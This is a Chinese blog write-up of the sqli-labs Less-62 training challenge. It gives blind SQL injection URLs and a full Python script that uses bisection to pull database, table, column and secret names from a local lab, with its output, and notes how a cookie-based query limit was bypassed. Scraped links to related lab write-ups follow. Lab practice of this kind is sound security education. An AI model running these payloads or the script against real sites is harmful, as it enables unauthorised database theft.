【sqli-labs】 less62 GET -Challenge -Blind -130 queries allowed -Variation1 (GET型 挑战 盲注 只允许130次查询 变化1)
允许130次尝试,然后是个盲注漏洞,看来要单字符猜解了
加单引号,页面异常,但报错被屏蔽了
http://192.168.136.128/sqli-labs-master/Less-62/?id=1'
加注释符,说明不止是用单引号闭合
http://192.168.136.128/sqli-labs-master/Less-62/?id=1'%23
加单括号,页面恢复正常
http://192.168.136.128/sqli-labs-master/Less-62/?id=1')%23
猜解数据库名
http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select database()),1,1))=98%23
http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select database()),1,1))=99%23
数据库第一位字符为ascii=99的字符,即'c'
表名第一位字符'W'
http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='challenges'),1,1))=87%23
http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select secret_1O45 from WOJXNS9PWT),1,1))=49%23
编写一个python脚本来完成操作
# -- coding: utf-8 --
# version: python 2.7
# file: less62.py
# time: 2018.2.4
# author: superkrissV import urllib
import urllib2 headers={
'Host': 'localhost',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate'
} target_url = "http://localhost/sqli-labs-master/Less-62/?id=1"
success_str = "Your Login name" # ')闭合
length_payload = "') and length(%s)>=%d #"
char_payload = "') and ascii(substr(%s, %d, 1))>=%d #" table_name = "(select table_name from information_schema.tables where table_schema='%s' limit %d,1)"
column_name = "(select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1)"
column_data = "(select %s from %s.%s limit %d, 1)" ascii_start = 33
ascii_end = 126 max_length = 50 count = 0
# 构造对应的payload并发送
def sendRequest(payload):
global count
count += 1
url = target_url + urllib.quote(payload)
# print url
try:
request = urllib2.Request(url=url, headers=headers)
response = urllib2.urlopen(request)
if success_str in response.read():
return True
return False
except urllib2.HTTPError as e:
return False # 利用递归和二分法获取长度
def getLength(start, end, command):
if (start+1) == end:return start
mid = (end+start) / 2
if sendRequest(length_payload % (command, mid)):
start = mid
else:
end = mid
# print start," ",end
result = getLength(start, end, command)
return result # 返回pos位置的字符的ascii码值
def getSingleChar(start, end, command, pos):
if (start+1) == end:return start
mid = (end+start) / 2
if sendRequest(char_payload % (command, pos, mid)):
start = mid
else:
end = mid
# print start," ",end
result = getSingleChar(start, end, command, pos)
return result def getInfo(command):
i = 1
info = ""
maxLen = getLength(1, max_length, command)
print command, " length:", maxLen
while(1):
if i > maxLen:break
info += chr(getSingleChar(ascii_start, ascii_end, command, i))
i += 1
print info getInfo("database()")
getInfo(table_name % ("challenges",0))
getInfo(column_name % ("challenges","ah5ketrxy1",0))
getInfo(column_name % ("challenges","ah5ketrxy1",1))
getInfo(column_name % ("challenges","ah5ketrxy1",2))
getInfo(column_data % ("secret_DRXQ","challenges", "ah5ketrxy1",0)) print "Count: ", count
输出如下
E:\python_scripts\dvwa>python less62.py
database() length:
c
ch
cha
chal
chall
challe
challen
challeng
challenge
challenges
(select table_name from information_schema.tables where table_schema='challenges' limit ,) length:
a
ah
ah5
ah5k
ah5ke
ah5ket
ah5ketr
ah5ketrx
ah5ketrxy
ah5ketrxy1
(select column_name from information_schema.columns where table_schema='challenges' and table_name='ah5ketrxy1' limit ,) length:
i
id
(select column_name from information_schema.columns where table_schema='challenges' and table_name='ah5ketrxy1' limit ,) length:
s
se
ses
sess
sessi
sessid
(select column_name from information_schema.columns where table_schema='challenges' and table_name='ah5ketrxy1' limit ,) length:
s
se
sec
secr
secre
secret
secret_
secret_D
secret_DR
secret_DRX
secret_DRXQ
(select secret_DRXQ from challenges.ah5ketrxy1 limit , ) length:
c
cL
cLi
cLit
cLitv
cLitvi
cLitviU
cLitviUK
cLitviUKt
cLitviUKt6
cLitviUKt6b
cLitviUKt6b0
cLitviUKt6b0l
cLitviUKt6b0lM
cLitviUKt6b0lM1
cLitviUKt6b0lM1X
cLitviUKt6b0lM1XE
cLitviUKt6b0lM1XEo
cLitviUKt6b0lM1XEoD
cLitviUKt6b0lM1XEoD1
cLitviUKt6b0lM1XEoD1X
cLitviUKt6b0lM1XEoD1XK
cLitviUKt6b0lM1XEoD1XKA
cLitviUKt6b0lM1XEoD1XKA2
Count:
可以发现,查出secret一共花了457个GET请求,远大于130的限制, 但是由于网站的计数是使用了cookie的,而脚本每次GET请求并没有携带相应的cookie,使得计数不成功,绕过了限制取到了数据
总共猜测字符至少24+11+10+10=55个(不算猜测长度),若在130的限制下,平均一个字符只有2-3次猜测机会,使用二分法的话,应该是不可能的。
【sqli-labs】 less62 GET -Challenge -Blind -130 queries allowed -Variation1 (GET型 挑战 盲注 只允许130次查询 变化1)的更多相关文章
- 【sqli-labs】 less63 GET -Challenge -Blind -130 queries allowed -Variation2 (GET型 挑战 盲注 只允许130次查询 变化2)
引号闭合 http://192.168.136.128/sqli-labs-master/Less-63/?id=1' or '1'='1 剩下的和Less62一样
- 【sqli-labs】 less65 GET -Challenge -Blind -130 queries allowed -Variation4 (GET型 挑战 盲注 只允许130次查询 变化4)
双引号括号闭合 http://192.168.136.128/sqli-labs-master/Less-65/?id=1")%23
- 【sqli-labs】 less64 GET -Challenge -Blind -130 queries allowed -Variation3 (GET型 挑战 盲注 只允许130次查询 变化3)
双括号整型 http://192.168.136.128/sqli-labs-master/Less-64/?id=1)) or ((1
- 【sqli-labs】 less55 GET -Challenge -Union -14 queries allowed -Variation1 (GET型 挑战 联合查询 只允许14次查询 变化2)
http://192.168.136.128/sqli-labs-master/Less-55/?id=1' 试了几次,整型带括号正常了 http://192.168.136.128/sqli-lab ...
- 【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型 挑战 联合查询 只允许10次查询 变化1)
尝试的次数只有10次 http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1' 单引号报错,错误信息没有显示 加注释符页面恢复正常 ...
- 【sqli-labs】 less58 GET -Challenge -Double Query -5 queries allowed -Variation1 (GET型 挑战 双查询 只允许5次查询 变化1)
单引号闭合成功,但是union select结果不对 http://192.168.136.128/sqli-labs-master/Less-58/?id=0' union select 1,2,3 ...
- 【sqli-labs】 less57 GET -Challenge -Union -14 queries allowed -Variation4 (GET型 挑战 联合查询 只允许14次查询 变化4)
双引号闭合 http://192.168.136.128/sqli-labs-master/Less-57/?id=1"%23 和less56一样查数据
- 【sqli-labs】 less56 GET -Challenge -Union -14 queries allowed -Variation3 (GET型 挑战 联合查询 只允许14次查询 变化3)
单引号括号闭合 http://192.168.136.128/sqli-labs-master/Less-56/?id=1')%23 http://192.168.136.128/sqli-labs- ...
- 【sqli-labs】 less61 GET -Challenge -Double Query -5 queries allowed -Variation4 (GET型 挑战 双查询 只允许5次查询 变化4)
http://192.168.136.128/sqli-labs-master/Less-61/?id=1' 单引号双括号闭合 192.168.136.128/sqli-labs-master/Les ...
随机推荐
- 【Android归纳】回调机制在Android中的应用与实战
回调这样的思想在程序中是比較普遍的.有时候可能我们并没有注意到.近期整理了一些对于回调的理解,分享给大家 先上概念...... 什么是回调函数? 回调函数就是一个通过函数指针调用的函数. 假设你把函数 ...
- linux系统的开机流程
开机流程: 1)BIOS:开机主动运行的韧体.会认识第一个可开机设备. 2)MBR:第一个可开机设备的第一个扇区内的主引导分区块.当中包括引导载入程序. 3)引导载入程序:一支可读取内核文件来运行的软 ...
- 使用 BenchmarkDotnet 测试代码性能 【Win10】单元测试中捕获异步方法的指定异常
先来点题外话,清明节前把工作辞了(去 tm 的垃圾团队,各种拉帮结派.勾心斗角).这次找工作就得慢慢找了,不能急了,希望能找到个好团队,好岗位吧.顺便这段时间也算是比较闲,也能学习一下和填掉手上的坑. ...
- mysql链接 及备份
服务器数据库命令:mysql -usparks -pi6K1yRWUQVaIR79Z5vG1 -hrm-bp13z51p96xdax6i0.mysql.rds.aliyuncs.com 服务器数据库备 ...
- java 翻页工具类
Pagination类 package com.paic.bics.core.mybatis.page; import java.util.List; @SuppressWarnings(" ...
- Python按行输出文件内容具体解释及延伸
下面两端測试代码分别为笔者所写,第一段为错误版本号.后者为正确版本号: #! /usr/bin/python2.7 try: filename = raw_input('please inpu ...
- solr入门之solr的拼写检查功能的应用级别尝试
今天主要是收集了些拼写检查方面的资料和 尝试使用一下拼写检查的功能--=遇到了不少问题 拼写检查的四种配置眼下我仅仅算是成功了半个吧 --------------------------------- ...
- 64位win2008下IIS未开启32位支持导致DLL无法加载问题
部署一个WEB项目,在本机.本地服务器都没有问题,但部署到远程服务器以后,提示有个DLL无法加载: Server Error in '/' Application. Could not load fi ...
- linux select poll and epoll
这里以socket文件来阐述它们之间的区别,假设现在服务器端有100 000个连接,即已经创建了100 000个socket. 1 select和poll 在我们的线程中,我们会弄一个死循环,在循环里 ...
- Codeforces Round #100 A. New Year Table
A. New Year Table time limit per test 2 seconds memory limit per test 256 megabytes input standard i ...